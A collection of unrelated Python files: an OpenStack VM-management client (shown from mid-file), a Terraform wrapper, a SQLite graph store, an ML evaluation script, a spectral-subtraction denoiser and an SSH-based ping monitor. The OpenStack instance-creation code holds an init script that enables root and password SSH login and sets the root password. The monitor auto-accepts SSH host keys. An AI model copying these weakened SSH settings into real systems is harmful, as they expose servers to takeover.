}
params.update(arguments)
servers_raw = self._request(
EndpointTypes.compute,
"/servers/detail",
is_json=True,
params=params,
page_collection_name="servers"
)
servers = ComputeServers(serialized_obj=servers_raw).servers
obj = OpenStackVM(servers, self.__cache_images, self.__flavors_cache, self.__networks_cache, self.__users_cache)
if arguments: # do no cache custom requests
return obj
else:
return self.__set_local_cache(LocalCacheType.SERVERS, obj)
def get_server_by_id(self, _id: str or OpenStackVMInfo) -> OpenStackVMInfo:
if isinstance(_id, OpenStackVMInfo):
_id = _id.id
r = self._request(
EndpointTypes.compute,
f"/servers/{_id}",
req_type=CurlRequestType.GET,
is_json=True
)
servers = [ComputeServerInfo(serialized_obj=r["server"])]
osvm = OpenStackVM(servers, self.__cache_images, self.__flavors_cache, self.__networks_cache)
return osvm.items[0]
@property
def servers(self) -> OpenStackVM:
return self.get_servers()
@property
def networks(self) -> OSNetwork:
if self.__networks_cache:
return self.__networks_cache
params = {
"limit": "1000"
}
networks = Networks(serialized_obj=self._request(
EndpointTypes.network,
"/networks",
is_json=True,
params=params,
page_collection_name="networks"
)).networks
subnets = Subnets(serialized_obj=self._request(
EndpointTypes.network,
"/subnets",
is_json=True,
params=params,
page_collection_name="subnets"
)).subnets
self.__networks_cache = OSNetwork().parse(networks, subnets)
self._conf.cache.set(OSNetwork, self.__networks_cache.serialize())
return self.__networks_cache
def get_server_by_cluster(self,
search_pattern: str = "",
sort: bool = False,
filter_func: Callable[[OpenStackVMInfo], bool] = None,
no_cache: bool = False,
only_owned: bool = False,
) -> Dict[str, List[OpenStackVMInfo]]:
"""
:param search_pattern: vm search pattern list
:param sort: sort resulting list
:param no_cache: force real server query, do not try to use cache
:param filter_func: if return true - item would be filtered, false not
"""
_servers: Dict[str, List[OpenStackVMInfo]] = {}
user_id = self._conf.user_id
# if no cached queries available, execute limited query
if no_cache or self.__get_local_cache(LocalCacheType.SERVERS) is None:
servers = self.get_servers(arguments={
"name": f"^{search_pattern}.*"
}).items
for server in servers:
if only_owned and server.owner_id != user_id:
continue
if filter_func and filter_func(server): # need to be last in the filtering chain
continue
if server.cluster_name not in _servers:
_servers[server.cluster_name] = []
_servers[server.cluster_name].append(server)
else: # if we already requested the full list, no need for another call
for server in self.servers:
_sname = server.cluster_name.lower()[:len(search_pattern)]
if search_pattern and search_pattern.lower() != _sname:
continue
if only_owned and server.owner_id != user_id:
continue
if filter_func and filter_func(server): # need to be last in the filtering chain
continue
if server.cluster_name not in _servers:
_servers[server.cluster_name] = []
_servers[server.cluster_name].append(server)
if sort:
for key in _servers:
_servers[key] = sorted(_servers[key], key=lambda x: x.name)
_servers = dict(sorted(_servers.items(), key=lambda x: x[0]))
return _servers
def get_server_console_log(self,
server_id: str or OpenStackVMInfo,
grep_by: str = None,
last_lines: int = 0
) -> List[str]:
if isinstance(server_id, OpenStackVMInfo):
server_id = server_id.id
params = None
if last_lines:
params = {
"length": last_lines
}
r = self._request(
EndpointTypes.compute,
f"/servers/{server_id}/action",
req_type=CurlRequestType.POST,
params=params,
data={
"os-getConsoleOutput": {
"length": None
}
},
is_json=True
)
lines: List[str] = r["output"].split("\n")
if grep_by:
lines = [line for line in lines if grep_by in line]
return lines
def _to_base64(self, s: str) -> str:
return str(base64.b64encode(s.encode("utf-8")), "utf-8")
def delete_image(self, image: DiskImageInfo) -> bool:
disk_id: str = image.id
try:
r = self._request(
EndpointTypes.image,
f"/images/{disk_id}",
req_type=CurlRequestType.DELETE
)
return True
except ValueError as e:
return False
def delete_instance(self, server: OpenStackVMInfo or ComputeServerInfo) -> bool:
server_id: str = server.id
try:
r = self._request(
EndpointTypes.compute,
f"/servers/{server_id}",
req_type=CurlRequestType.DELETE
)
return r is not None
except ValueError as e:
return False
def get_keypairs(self, no_cache: bool = False) -> List[VMKeypairItemValue]:
if no_cache:
self.__invalidate_local_cache(LocalCacheType.KEYPAIR)
_cache = self.__get_local_cache(LocalCacheType.KEYPAIR)
if _cache:
return list(_cache.values())
try:
r = self._request(
EndpointTypes.compute,
"/os-keypairs",
req_type=CurlRequestType.GET,
is_json=True
)
return list(self.__set_local_cache(
LocalCacheType.KEYPAIR,
{kp.keypair.name: kp.keypair for kp in VMKeypairs(serialized_obj=r).keypairs}
).values())
except ValueError as e:
self.__last_errors.append(str(e))
return []
def get_keypair(self, name: str, default: VMKeypairItemValue = None, no_cache: bool = False) -> VMKeypairItemValue or None:
_cache = self.__get_local_cache(LocalCacheType.KEYPAIR)
if not no_cache and _cache and name in _cache:
return _cache[name]
try:
r = self._request(
EndpointTypes.compute,
f"/os-keypairs/{name}",
req_type=CurlRequestType.GET,
is_json=True
)
return VMKeypairItem(serialized_obj=r).keypair
except ValueError as e:
self.__last_errors.append(str(e))
return default
def delete_keypair(self, name: str) -> bool:
try:
r = self._request(
EndpointTypes.compute,
f"/os-keypairs/{name}",
req_type=CurlRequestType.DELETE
)
return True
except ValueError as e:
self.__last_errors.append(str(e))
return False
def create_keypair(self, name: str, public_key: str) -> bool:
try:
data = {
"keypair": {
"name": name,
"public_key": public_key
}
}
r = self._request(
EndpointTypes.compute,
"/os-keypairs",
req_type=CurlRequestType.POST,
is_json=True,
data=data
)
return VMKeypairItem(serialized_obj=r).keypair.name == name
except ValueError as e:
self.__last_errors.append(str(e))
return False
def create_key(self, key: VMKeypairItemValue) -> bool:
return self.create_keypair(key.name, key.public_key)
def __server_action(self, server: OpenStackVMInfo or ComputeServerInfo, action: ComputeServerActions,
action_data: dict = None) -> bool:
server_id: str = server.id
try:
action_raw = {
action.value: action_data
}
r = self._request(
EndpointTypes.compute,
f"/servers/{server_id}/action",
req_type=CurlRequestType.POST,
is_json=True,
data=action_raw
)
return True
except ValueError as e:
self.__last_errors.append(str(e))
except Exception as e:
print(str(e), file=sys.stderr)
return False
def stop_instance(self, server: OpenStackVMInfo or ComputeServerInfo) -> bool:
return self.__server_action(server, ComputeServerActions.stop)
def start_instance(self, server: OpenStackVMInfo or ComputeServerInfo) -> bool:
return self.__server_action(server, ComputeServerActions.start)
def reboot_instance(self, server: OpenStackVMInfo or ComputeServerInfo,
how: ComputeServerActionRebootType = ComputeServerActionRebootType.hard) -> bool:
return self.__server_action(server, ComputeServerActions.reboot, {"type": how.value})
def get_server_status(self, servers_id: str or OpenStackVMInfo) -> ServerState:
return self.get_server_by_id(servers_id).status
def create_instances(self, cluster_names: Union[List[str], str], image: OSImageInfo, flavor: OSFlavor,
password: str, ssh_key: VMKeypairItemValue = None, count: int = 1) -> List[OpenStackVMInfo]:
custom_user = "openstack"
init_script = f"""#!/bin/bash
echo 'PermitRootLogin yes'| cat - /etc/ssh/sshd_config > /tmp/sshd_config
echo 'PasswordAuthentication yes'| cat - /tmp/sshd_config > /etc/ssh/sshd_config && rm -f /tmp/sshd_config
useradd {custom_user}; echo -e "{password}\n{password}"|passwd {custom_user}
echo -e "{password}\n{password}"|passwd root
systemctl restart ssh.service
systemctl restart sshd.service
"""
if ssh_key:
init_script += f"""
KEY='{ssh_key.public_key}'
echo ${{KEY}} >/root/.ssh/authorized_keys
mkdir -p /home/{custom_user}/.ssh; echo '${{KEY}}' >/home/{custom_user}/.ssh/authorized_keys
"""
init_script += f"""
UID_MIN=$(grep -E '^UID_MIN' /etc/login.defs | tr -d -c 0-9)
USERS=$(awk -v uid_min="${{UID_MIN}}" -F: '$3 >= uid_min && $1 != "nobody" {{printf "%s ",$1}}' /etc/passwd)
echo "@users@: ${{USERS}}"
"""
if isinstance(cluster_names, str):
cluster_names: List[str] = [cluster_names]
if len(cluster_names) > 1: # we can create eighter bulk of cluster with one request or with different request
count: int = 1
created_servers: List[OpenStackVMInfo] = []
for cluster_name in cluster_names:
builder = VMCreateBuilder(cluster_name) \
.set_admin_pass(password) \
.set_image(image.base_image) \
.set_flavor(flavor) \
.add_network(self._conf.default_network) \
.set_user_data(init_script) \
.set_instances_count(count) \
.enable_reservation_id()
if ssh_key:
builder.set_key_name(ssh_key.name)
r = None
try:
r = self._request(
EndpointTypes.compute,
"/servers",
req_type=CurlRequestType.POST,
is_json=True,
data=builder.build().serialize()
)
except ValueError as e:
self.__last_errors.append(str(e))
return []
if (response := VMCreateResponse(serialized_obj=r)) and response.reservation_id:
servers = self.get_servers({"reservation_id": response.reservation_id})
created_servers.extend(list(servers.items))
else:
created_servers.append(self.get_server_by_id(response.server.id))
return created_servers
|
#! /usr/bin/env python3
# encoding: utf-8
'''
Wrapper to install Acpera with Terraform on AWS.
@author: <NAME>
@license: Apache License 2.0
@contact: <EMAIL>
'''
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
from configparser import ConfigParser
from itertools import chain
import json
import os
import platform
import shutil
import sys
import time
import subprocess as sp
__all__ = []
__version__ = 0.1
__date__ = '2017-04-22'
__updated__ = '2017-04-22'
DEBUG = 0
TESTRUN = 0
PROFILE = 0
class Terraform():
def __init__(self, args):
self.args = args
@property
def aws(self):
"""terraform apply"""
print("Terraform apply aws")
sp.call([self.args.terraform_path, "init"])
sp.call([self.args.terraform_path, "get"])
sp.call([self.args.terraform_path, "validate"])
sp.call([self.args.terraform_path, "plan", "-target=module.aws"])
sp.call([self.args.terraform_path, "apply", "-target=module.aws"])
sp.call([self.args.terraform_path, "refresh"])
@property
def destroy_aws(self):
"""terraform destroy"""
print("Terraform destroy aws")
sp.call([self.args.terraform_path, "init"])
sp.call([self.args.terraform_path, "get"])
sp.call([self.args.terraform_path, "validate"])
sp.call([self.args.terraform_path, "plan", "-destroy", "-target=module.aws"])
sp.call([self.args.terraform_path, "destroy", "-target=module.aws"])
class CLIError(Exception):
'''Generic exception to raise and log different fatal errors.'''
def __init__(self, msg):
super(CLIError).__init__(type(self))
self.msg = "E: %s" % msg
def __str__(self):
return self.msg
def __unicode__(self):
return self.msg
def is_os_64bit():
return platform.machine().endswith('64')
def main(argv=None): # IGNORE:C0111
'''Command line options.'''
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
program_name = os.path.basename(sys.argv[0])
program_version = "v%s" % __version__
program_build_date = str(__updated__)
program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)
program_shortdesc = __import__('__main__').__doc__.split("\n")[1]
program_license = '''%s
Created by <NAME> on %s.
Licensed under the Apache License 2.0
http://www.apache.org/licenses/LICENSE-2.0
Distributed on an "AS IS" basis without warranties
or conditions of any kind, either express or implied.
USAGE
''' % (program_shortdesc, str(__date__))
try:
# Setup argument parser
parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)
parser.add_argument('-V', '--version', action='version', version=program_version_message)
parser.add_argument('-d', '--domain', help='domain name', default='netanza.com')
parser.add_argument("action", help="aws|destroy_aws")
# Process arguments
args = parser.parse_args()
action = args.action
if os.name == "posix":
args.terraform_path = os.path.join("contrib", "terraform-linux", "terraform")
elif is_os_64bit():
args.terraform_path = os.path.join("contrib", "terraform-win64", "terraform.exe")
else:
args.terraform_path = os.path.join("contrib", "terraform-win32", "terraform.exe")
t = Terraform(args)
if action == "aws":
t.aws
elif action == "destroy_aws":
t.destroy_aws
else:
print("Unknown action")
return 0
except KeyboardInterrupt:
### handle keyboard interrupt ###
return 0
except Exception as e:
if DEBUG or TESTRUN:
raise(e)
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help")
return 2
if __name__ == "__main__":
if DEBUG:
sys.argv.append("-h")
sys.argv.append("-v")
sys.argv.append("-r")
if TESTRUN:
import doctest
doctest.testmod()
if PROFILE:
import cProfile
import pstats
profile_filename = '_profile.txt'
cProfile.run('main()', profile_filename)
statsfile = open("profile_stats.txt", "wb")
p = pstats.Stats(profile_filename, stream=statsfile)
stats = p.strip_dirs().sort_stats('cumulative')
stats.print_stats()
statsfile.close()
sys.exit(0)
sys.exit(main())
|
import json
import sqlite3
from typing import Dict, List, Set, Union
from .database import Database
from .edge import Edge
from .node import Node
class Graph:
"""Graph representation from SQLite db."""
def __init__(self, db_path: str) -> None:
"""Database initialization from new or existing path.
Params:
db_path (str): Path to a new SQLite database
or existing database.
"""
self.database = Database(db_path=db_path, row_factory=True)
self.schemas = self._all_schemas()
self.nodes = self._all_schema_nodes()
self.edges = self._all_schema_edges()
def _all_schemas(self) -> Set[str]:
"""Fetch all schemas on init.
If the database already exists then we
need a `Set` of all schema names that exist.
This requires de-duping the `<schema_name>_nodes`
and `<schema_name>_edges`. We then split the
prefix out of the table name.
"""
schema_rows = self.database.get_schemas()
schema_list = [schema["name"] for schema in schema_rows]
return set(
[schema_name.split("_")[0] for schema_name in schema_list]
)
def _all_schema_nodes(self) -> Dict[str, Node]:
"""Fetch all nodes for all schemas.
Gets all nodes from every schema that we have.
Params:
None
Returns:
nodes (Dict[str, Node]): Dict of node IDs and node objects
or an empty dictionary.
"""
nodes = {}
for schema_name in self.schemas:
node_rows = self.database.get_all_nodes(schema_name=schema_name)
for node_row in node_rows:
node = self._create_node(schema_name=schema_name, node_row=node_row)
nodes[node.id] = node
return nodes
def _all_schema_edges(self) -> List[Edge]:
"""Fetch all edges for all schemas.
Gets all edges from every schema that we have.
Params:
None
Returns:
edges (List[Edge]): List of edge objects or an empty list.
"""
edges = []
for schema_name in self.schemas:
edge_rows = self.database.get_all_edges(schema_name=schema_name)
for edge_row in edge_rows:
edge = self._create_edge(schema_name=schema_name, edge_row=edge_row)
edges.append(edge)
return edges
def add_schema(self, schema_name: str) -> None:
"""Adds a schema.
Params:
schema_name (str): Schema name for the DB.
Returns:
None
"""
self.database.add_schema(schema_name=schema_name)
self.schemas.add(schema_name)
def add_node(self, schema_name: str, node: Node) -> None:
"""Adds a node.
Params:
schema_name (str): Schema name for the DB.
node (Node): A node instance to add to the db
and graph.
Returns:
None
"""
self.database.add_node(
schema_name=schema_name,
node_id=node.id,
node_body=node.body
)
new_node = self.database.get_node(schema_name=schema_name, node_id=node.id)
self.nodes[new_node["id"]] = self._create_node(
schema_name=schema_name,
node_row=new_node,
)
def add_edge(self, edge: Edge) -> None:
"""Adds an edge.
Params:
schema_name (str): Schema name for the DB.
edge (Edge): An edge instance to add to the db
and graph.
Returns:
None
"""
self.database.add_edge(
schema_name=edge.schema_name,
source_id=edge.source.id,
target_id=edge.target.id,
source_schema_name=edge.source_schema_name,
target_schema_name=edge.target_schema_name,
properties=edge.properties,
)
edge_data = self.database.get_edge(
schema_name=edge.schema_name,
source_id=edge.source.id,
target_id=edge.target.id,
)
self.edges.append(
self._create_edge(
schema_name=edge.schema_name,
edge_row=edge_data,
)
)
def update_node(self, node: Node) -> None:
"""Updates a node in the DB and graph.
Params:
node (Node): Updates a node in the DB.
Be sure to update the `body` before
passing it to be updated.
Returns:
None
"""
self.database.update_node(
schema_name=node.schema_name,
node_id=node.id,
node_body=node.body,
)
updated_node_data = self.database.get_node(
schema_name=node.schema_name,
node_id=node.id
)
updated_node = self._create_node(
schema_name=node.schema_name,
node_row=updated_node_data,
)
self.nodes[updated_node.id] = updated_node
def update_edge(self, edge: Edge) -> None:
"""Updates a edge in the DB and graph.
Does not change the `source` or `target`
of the edge.
Params:
edge (Edge): Updates a edge in the DB.
Be sure to update the `properties`
before passing it to be updated.
Returns:
None
"""
self.database.update_edge(
schema_name=edge.schema_name,
source_id=edge.source.id,
target_id=edge.target.id,
properties=edge.properties,
)
updated_edge_data = self.database.get_edge(
schema_name=edge.schema_name,
source_id=edge.source.id,
target_id=edge.target.id,
)
updated_edge = self._create_edge(
schema_name=edge.schema_name,
edge_row=updated_edge_data,
)
for edge in self.edges:
if edge.__eq__(updated_edge.source, updated_edge.target):
self.edges.remove(edge)
self.edges.append(updated_edge)
def get_schema(self, schema_name: str) -> Union[str, None]:
"""Fetch a schema.
Gets a schema from the graph. If it
exists it is returned.
Params:
schema_name (str): Schema name to check.
Returns:
schema_name (str | None): A schema name, if exists.
"""
if schema_name in self.schemas:
return schema_name
else:
return None
def get_node(self, node_id: str) -> Union[Node, None]:
"""Fetch a node.
Get a node by the ID.
Params:
node_id (str): ID of a node.
Returns:
node (Node | None): Node object, if exists.
"""
if self.nodes[node_id]:
return self.nodes[node_id]
else:
return None
def get_edge(self, source: Node, target: Node) -> Union[Edge, None]:
"""Fetch a edge.
Get a edge by the ID of the
source and target nodes.
Params:
source (Node): Source node of the edge.
target (Node): Target node of the edge.
Returns:
edge (Edge | None): Edge object, if exists.
"""
for edge in self.edges:
if edge.__eq__(source=source, target=target):
return edge
return None
def delete_schema(self, schema_name: str) -> None:
"""Remove a schema from the DB and graph."""
self.database.delete_schema(schema_name=schema_name)
self.schemas.remove(schema_name)
def delete_node(self, node: Node) -> None:
"""Remove a node from the DB and graph."""
self.database.delete_node(schema_name=node.schema_name, node_id=node.id)
self.nodes.pop(node.id)
def delete_edge(self, edge: Edge) -> None:
"""Remove an edge from the DB and graph."""
self.database.delete_edge(
schema_name=edge.schema_name,
source_id=edge.source.id,
target_id=edge.target.id,
)
for e in self.edges:
if edge.__eq__(e.source, e.target):
self.edges.remove(e)
def _create_node(self, schema_name: str, node_row: sqlite3.Row) -> Node:
"""A Node constructor.
Returns a `Node` object from a database
`Row` object.
Params:
schema_name (str): Schema name to use.
node_row (sqlite3.Row): A SQLite database row.
Returns:
node (Node): A node object.
"""
return Node(
schema_name=schema_name,
id=node_row["id"],
body=json.loads(node_row["body"]),
)
def _create_edge(self, schema_name: str, edge_row: sqlite3.Row) -> Edge:
"""A Edge constructor.
Constructs nodes and an edge
given the data from the database.
Params:
schema_name (str): Schema name to use.
edge_row (sqlite3.Row): A SQLite database row.
Returns:
edge (Edge): A edge object.
"""
return Edge(
schema_name=schema_name,
source=self.get_node(edge_row["source"]),
target=self.get_node(edge_row["target"]),
properties=json.loads(edge_row["properties"]),
)
|
<gh_stars>0
import numpy as np
import pandas as pd
import argparse
import copy
import pathlib
import pdb
import pickle
from model_eval import model_evaluation, utils
def main():
parser = argparse.ArgumentParser(description="Run evaluation on aspirin dataset")
parser.add_argument("--max_order", type=int, required=True,
help="number of GMP orders to include")
args = parser.parse_args()
args_dict = vars(args)
#sigmas = [0.25, 1.0, 2.0]
sigmas = [0.25, 0.75, 1.5, 2.0]
all_mcsh_groups = {"0": {"groups": [1]},
"1": {"groups": [1]},
"2": {"groups": [1,2]},
"3": {"groups": [1,2,3]},
"4": {"groups": [1,2,3,4]},
"5": {"groups": [1,2,3,4,5]},
"6": {"groups": [1,2,3,4,5,6,7]},
"7": {"groups": [1,2,3,4,5,6,7,8]},
"8": {"groups": [1,2,3,4,5,6,7,8,9,10]}}
MCSHs = {}
for order in range(args_dict["max_order"] + 1):
order_str = str(order)
MCSHs[order_str] = all_mcsh_groups[order_str]
MCSHs[order_str]["sigmas"] = sigmas
top_dir = pathlib.Path("/storage/home/hcoda1/7/plai30")
gaussians_dir = top_dir / "sandbox/config/valence_gaussians"
gmp_params = {
"atom_gaussians": {
"C": str(gaussians_dir / "C_pseudodensity_4.g"),
"H": str(gaussians_dir / "H_pseudodensity_2.g"),
"O": str(gaussians_dir / "O_pseudodensity_4.g")
},
"MCSHs": MCSHs,
"cutoff": 10
}
elements = ["C","H","O"]
amptorch_config = {
"model": {
"name":"singlenn",
"get_forces": False,
"num_layers": 3,
"num_nodes": 50,
"batchnorm": True
},
"optim": {
"gpus": 0,
"force_coefficient": 0.0,
"lr": 1e-3,
"batch_size": 256,
"epochs": 500,
"loss": "mae",
},
"dataset": {
"val_split": 0.2,
"elements": elements,
"fp_scheme": "mcsh",
"fp_params": gmp_params,
"save_fps": False,
"scaling": {
"type": "normalize",
"range": (0, 1),
"elementwise":False
}
},
"cmd": {
"debug": False,
"identifier": "test",
"verbose": True,
"logger": False
}
}
base_config = {
"evaluation_type": "train_test_split",
"seed": 1,
"amptorch_config": amptorch_config
}
run_name = "convergence_order_{}".format(args_dict["max_order"])
num_eval_trials = 5
test_configs = []
test_datasets = []
for i in range(num_eval_trials):
curr_test_config = copy.deepcopy(base_config)
curr_test_config["name"] = "{}_{}".format(run_name, i + 1)
curr_test_config["seed"] = 1
curr_test_config["amptorch_config"]["cmd"]["seed"] = 1
test_configs.append(curr_test_config)
curr_train_data_file = str(top_dir / "p-amedford6-0/data/aspirin/aspirin_train_data_{}.p".format(i + 1))
curr_test_data_file = str(top_dir / "p-amedford6-0/data/aspirin/aspirin_test_data_{}.p".format(i + 1))
curr_dataset = model_evaluation.dataset(train_data_files=[curr_train_data_file], test_data_files=[curr_test_data_file])
test_datasets.append(curr_dataset)
curr_dir = pathlib.Path(__file__).parent.absolute()
save_model_dir = curr_dir / "{}_model_checkpoints".format(run_name)
num_training_iters = 10
for i in range(num_training_iters):
print("Evaluating models for training iteration {}".format(i + 1))
workspace = curr_dir / "workspace_{}_{}".format(run_name, i + 1)
checkpoint_dirs = []
if i != 0:
#find checkpoint directories
for config in test_configs:
checkpoint_dirs.append(utils.get_checkpoint_dir(save_model_dir / config["name"]))
#if this is the last iteration, no need to save models
if i >= num_training_iters - 1:
save_model_dir = ""
results = model_evaluation.evaluate_models(datasets=test_datasets, config_dicts=test_configs,
enable_parallel=True, workspace=workspace,
time_limit="03:00:00", mem_limit=2, conda_env="amptorch",
save_model_dir=save_model_dir, checkpoint_dirs=checkpoint_dirs)
#print results
errors = [metrics.test_error for metrics in results]
print("Test errors after training iteration {}: {}".format(i + 1, errors))
print("MAE: {}".format(np.mean(errors)))
if __name__ == "__main__":
main()
|
<reponame>HemaZ/pyroomacoustics
# Single Channel Noise Removal using Spectral Subtraction
# Copyright (C) 2019 <NAME>, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# You should have received a copy of the MIT License along with this program. If
# not, see <https://opensource.org/licenses/MIT>.
import numpy as np
class SpectralSub(object):
"""
Here we have a class for performing **single channel** noise reduction via
spectral subtraction. The instantaneous signal energy and noise floor is
estimated at each time instance (for each frequency bin) and this is used
to compute a gain filter with which to perform spectral subtraction.
For a given frame `n`, the gain for frequency bin `k` is given by:
.. math::
G[k, n] = \max \\left \{ \\left ( \dfrac{P[k, n]-\\beta P_N[k, n]}{P[k, n]} \\right )^\\alpha, G_{min} \\right \},
where :math:`G_{min} = 10^{-(db\_reduc/20)}` and :math:`db\_reduc` is the
maximum reduction (in dB) that we are willing to perform for each bin (a
high value can actually be detrimental, see below). The instantaneous
energy :math:`P[k,n]` is computed by simply squaring the frequency
amplitude at the bin `k`. The time-frequency decomposition of the input
signal is typically done with the STFT and overlapping frames. The noise
estimate :math:`P_N[k, n]` for frequency bin `k` is given by looking back a
certain number of frames :math:`L` and selecting the bin with the lowest
energy:
.. math::
P_N[k, n] = \min_{[n-L, n]} P[k, n]
This approach works best when the SNR is positive and the noise is rather
stationary. An alternative approach for the noise estimate (also in the
case of stationary noise) would be to apply a lowpass filter for each
frequency bin.
With a large suppression, i.e. large values for :math:`db\_reduc`, we can
observe a typical artefact of such spectral subtraction approaches, namely
"musical noise".
`Here <https://www.vocal.com/noise-reduction/musical-noise/>`_ is nice
article about noise reduction and musical noise.
Adjusting the constants :math:`\\beta` and :math:`\\alpha` also presents a
trade-off between suppression and undesirable artefacts, i.e. more
noticeable musical noise.
Below is an example of how to use this class to emulate a streaming/online
input. A full example can be found
`here <https://github.com/LCAV/pyroomacoustics/blob/master/examples/noise_reduction_spectral_subtraction.py>`__.
::
# initialize STFT and SpectralSub objects
nfft = 512
stft = pra.transform.STFT(nfft, hop=nfft//2,
analysis_window=pra.hann(nfft))
scnr = pra.denoise.SpectralSub(nfft, db_reduc=10, lookback=5,
beta=20, alpha=3)
# apply block-by-block
for n in range(num_blocks):
# go to frequency domain for noise reduction
stft.analysis(mono_noisy)
gain_filt = scnr.compute_gain_filter(stft.X)
# estimating input convolved with unknown response
mono_denoised = stft.synthesis(gain_filt*stft.X)
There also exists a "one-shot" function.
::
# import or create `noisy_signal`
denoised_signal = apply_spectral_sub(noisy_signal, nfft=512,
db_reduc=10, lookback=5,
beta=20, alpha=3)
Parameters
----------
nfft: int
FFT size. Length of gain filter, i.e. the number of frequency bins, is
given by ``nfft//2+1``.
db_reduc: float
Maximum reduction in dB for each bin.
lookback: int
How many frames to look back for the noise estimate.
beta: float
Overestimation factor to "push" the gain filter value (at each
frequency) closer to the dB reduction specified by ``db_reduc``.
alpha: float, optional
Exponent factor to modify transition behavior towards the dB reduction
specified by ``db_reduc``. Default is 1.
"""
def __init__(self, nfft, db_reduc, lookback, beta, alpha=1):
self.beta = beta
self.alpha = alpha
self.n_bins = nfft//2+1
self.p_prev = np.zeros((self.n_bins, lookback+1))
self.gmin = 10**(-db_reduc/20)
self.p_sn = np.zeros(self.n_bins)
self.p_n = np.zeros(self.n_bins)
def compute_gain_filter(self, X):
"""
Parameters
----------
X: numpy array
Complex spectrum of length ``nfft//2+1``.
Returns
-------
numpy array
Gain filter to multiply given spectrum with.
"""
# estimate of signal + noise at current time
self.p_sn[:] = np.real(np.conj(X)*X)
# estimate of noise level
self.p_prev[:, -1] = self.p_sn
self.p_n[:] = np.min(self.p_prev, axis=1)
# compute gain filter
gain_filter = [max((max(self.p_sn[k]-self.beta*self.p_n[k], 0) /
self.p_sn[k])**self.alpha, self.gmin)
for k in range(self.n_bins)]
# update
self.p_prev = np.roll(self.p_prev, -1, axis=1)
return gain_filter
def apply_spectral_sub(noisy_signal, nfft=512, db_reduc=25, lookback=12,
beta=30, alpha=1):
"""
One-shot function to apply spectral subtraction approach.
Parameters
----------
noisy_signal : numpy array
Real signal in time domain.
nfft: int
FFT size. Length of gain filter, i.e. the number of frequency bins, is
given by ``nfft//2+1``.
db_reduc: float
Maximum reduction in dB for each bin.
lookback: int
How many frames to look back for the noise estimate.
beta: float
Overestimation factor to "push" the gain filter value (at each
frequency) closer to the dB reduction specified by ``db_reduc``.
alpha: float, optional
Exponent factor to modify transition behavior towards the dB reduction
specified by ``db_reduc``. Default is 1.
Returns
-------
numpy array
Enhanced/denoised signal.
"""
from pyroomacoustics import hann
from pyroomacoustics.transform import STFT
hop = nfft // 2
window = hann(nfft, flag='asymmetric', length='full')
stft = STFT(nfft, hop=hop, analysis_window=window, streaming=True)
scnr = SpectralSub(nfft, db_reduc, lookback, beta, alpha)
processed_audio = np.zeros(noisy_signal.shape)
n = 0
while noisy_signal.shape[0] - n >= hop:
# SCNR in frequency domain
stft.analysis(noisy_signal[n:(n + hop), ])
gain_filt = scnr.compute_gain_filter(stft.X)
# back to time domain
processed_audio[n:n + hop, ] = stft.synthesis(gain_filt * stft.X)
# update step
n += hop
return processed_audio
|
<filename>ExternalTools/DelayThread.py
import logging
import pexpect
import threading
from multiprocessing import Process
import sys
class DelayMonitor():
def __init__(self, client_ip, client_user, client_pass, server_ip, ping_count):
#threading.Thread.__init__(self)
log_namespace = "Monitor."+__name__
self.logger = logging.getLogger(log_namespace)
self.logger.setLevel(logging.DEBUG)
self.thread_name = "[PING:"+client_ip+"->"+server_ip+"]"
self.CLIENT_IP = client_ip
self.CLIENT_USER = client_user
self.CLIENT_PASS = client_pass
self.SERVER_IP = server_ip
self.PING_COMMAND = "ping "+server_ip+" -i 1"
self.ping_count = ping_count
self.values = []
self.finished = False
self.CONNECT_COMMAND = 'ssh '+self.CLIENT_USER+'@'+self.CLIENT_IP
self.c_pexpect = self.connectClient()
self.isConnected = False
if(self.c_pexpect!=None):
self.isConnected = True
self.currentDelay = 0
def setPingCount(self, count):
self.ping_count = count
def startCapturingDelay(self):
self.values = []
p = threading.Thread(target=self.run)
p.start()
self.finished = False
return p
def run(self):
try:
if(self.isConnected!=True):
return
command = self.PING_COMMAND+" -c "+str(self.ping_count)
self.c_pexpect.sendline(s=command)
self.c_pexpect.expect(self.CLIENT_USER+'@', timeout=1000, searchwindowsize=1000)
s = self.c_pexpect.before
self.pingAllLinesParser(s)
self.finished = True
return True
except:
print sys.exc_info()[1]
return False
def pingAllLinesParser(self,output):
try:
lines = output.split('\n')
for line in lines:
if line.__contains__("icmp")==False:
continue
columns = line.split(' ')
col = columns[6]
col = col.split('=')
rtt_avg = float(col[1])
self.values.append(rtt_avg)
self.currentDelay = rtt_avg
#print self.thread_name, self.values
except:
self.logger.error(self.thread_name+"Error parsing output.")
def stopCapturingDelay(self):
self.c_pexpect.sendcontrol('c')
def getCurrentDelay(self):
return self.currentDelay
def connectClient(self):
p = pexpect.spawn(self.CONNECT_COMMAND)
while True:
i=p.expect(['password:','Welcome to Ubuntu',pexpect.EOF, "Are you sure you want to continue connecting (yes/no)?"])
if i==0:
p.sendline(self.CLIENT_PASS)
elif i==1:
self.logger.debug(self.thread_name+"Login Successfull!")
self.logger.debug(self.thread_name+"Client at %s ready."%self.CLIENT_IP)
p.expect(self.CLIENT_USER+'@')
return p
elif i==2:
self.logger.error(self.thread_name+"Connection timeout.")
return None
elif i==3:
p.sendline("yes")
return None
def updatePing(self,ping_count):
if(self.isConnected!=True):
return
